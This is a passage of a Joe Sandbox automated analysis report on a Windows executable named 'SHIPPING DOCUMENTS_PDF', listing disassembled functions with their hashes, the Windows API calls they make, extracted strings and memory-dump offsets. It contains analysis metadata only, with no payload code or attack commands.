                                                                                    • Opcode ID: 9d5588cc54a79ba0b28fa21a96282c491df56c430ffa6975f09b84fc2333f48f
                                                                                    • Instruction ID: 628a162c51e579d7371e2d40d5c8919743a72f94ae03802b84c1a15a9c0a0d34
                                                                                    • Opcode Fuzzy Hash: 9d5588cc54a79ba0b28fa21a96282c491df56c430ffa6975f09b84fc2333f48f
                                                                                    • Instruction Fuzzy Hash: DCE09232A042292BE7209A99AC4ABF7FBECEB55B60F004067FD44D3051EA709A45C7E0
                                                                                    APIs
                                                                                      • Part of subcall function 00B8B314: _memset.LIBCMT ref: 00B8B321
                                                                                      • Part of subcall function 00B70940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00B8B2F0,?,?,?,00B5100A), ref: 00B70945
                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,00B5100A), ref: 00B8B2F4
                                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00B5100A), ref: 00B8B303
                                                                                    Strings
                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00B8B2FE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                    • API String ID: 3158253471-631824599
                                                                                    • Opcode ID: 3f75a0ec547363a3bd2b709e4d4155d8461b2403fe3b2b2d549ceb32d9e7a6f5
                                                                                    • Instruction ID: 102c37c2372bfff6491d8dc6aabe280b960b9cb8df58230c8d3c8ba750d8b383
                                                                                    • Opcode Fuzzy Hash: 3f75a0ec547363a3bd2b709e4d4155d8461b2403fe3b2b2d549ceb32d9e7a6f5
                                                                                    • Instruction Fuzzy Hash: C4E06D71600702CBD720AF38E814756BBE4BF04314F0489ADF856C76A1EBB4D408CBA1
                                                                                    APIs
                                                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00BA7C82
                                                                                      • Part of subcall function 00B73358: _doexit.LIBCMT ref: 00B73362
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message_doexit
                                                                                    • String ID: AutoIt$Error allocating memory.
                                                                                    • API String ID: 1993061046-4017498283
                                                                                    • Opcode ID: 832034c0a440a33caa285596e360b2fd012b6f84c8db7464ea27d257cfd5a3c6
                                                                                    • Instruction ID: e2b1776cf7827994ee72e9713b195bde65a1c7ac84885fbfd9161e37b702ac0a
                                                                                    • Opcode Fuzzy Hash: 832034c0a440a33caa285596e360b2fd012b6f84c8db7464ea27d257cfd5a3c6
                                                                                    • Instruction Fuzzy Hash: CED012323C935836D11532A96C06BDA66C88B05B56F1444A6FB18995D34ED1958091A9
                                                                                    APIs
                                                                                    • GetSystemDirectoryW.KERNEL32(?), ref: 00B91775
                                                                                      • Part of subcall function 00BCBFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,00B9195E,?), ref: 00BCBFFE
                                                                                      • Part of subcall function 00BCBFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00BCC010
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00B9196D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                                    • String ID: WIN_XPe
                                                                                    • API String ID: 582185067-3257408948
                                                                                    • Opcode ID: 900aa5e76ae8ddf3c619df22ed70853d394802e493ba22653af3dd559766a96b
                                                                                    • Instruction ID: 3cd40d19ead060c6bbd18cc40185eb09339770a56686d1aeb62c1d5b8c0557f1
                                                                                    • Opcode Fuzzy Hash: 900aa5e76ae8ddf3c619df22ed70853d394802e493ba22653af3dd559766a96b
                                                                                    • Instruction Fuzzy Hash: 04F0A5B080510ADFDB15DB95C9D4BECBBF8AB08301F5404EAE102A31A0DB758F84EF60
                                                                                    APIs
                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00BD59AE
                                                                                    • PostMessageW.USER32(00000000), ref: 00BD59B5
                                                                                      • Part of subcall function 00BB5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00BB52BC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                    • String ID: Shell_TrayWnd
                                                                                    • API String ID: 529655941-2988720461
                                                                                    • Opcode ID: 7d3b6ee2a4b2e82890288b473f05a1a47f57cc58cea6f5bd55af92b9e5f90436
                                                                                    • Instruction ID: c57dec13077628148c3b280427c63425869734b6139e0af1890d3f916be4ee82
                                                                                    • Opcode Fuzzy Hash: 7d3b6ee2a4b2e82890288b473f05a1a47f57cc58cea6f5bd55af92b9e5f90436
                                                                                    • Instruction Fuzzy Hash: 8CD0C9313863127BEA64BB70AC1BFE6A655BB14B50F040836B346AB1D0DDE0A800C658
                                                                                    APIs
                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00BD596E
                                                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00BD5981
                                                                                      • Part of subcall function 00BB5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00BB52BC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                    • String ID: Shell_TrayWnd
                                                                                    • API String ID: 529655941-2988720461
                                                                                    • Opcode ID: 22db542f2a627c30a0674039e0b8cf433f97ca57b7f429359969414a52b969a1
                                                                                    • Instruction ID: 8f69f5b97d33bf3c161b63b9b85ab2f5661cb8f956bf7db0aca94365f5f5670e
                                                                                    • Opcode Fuzzy Hash: 22db542f2a627c30a0674039e0b8cf433f97ca57b7f429359969414a52b969a1
                                                                                    • Instruction Fuzzy Hash: BAD0C935389312B7EA64BB70AC2BFE6AA55BB10B50F040836B34AAB1D0DDE0A800C654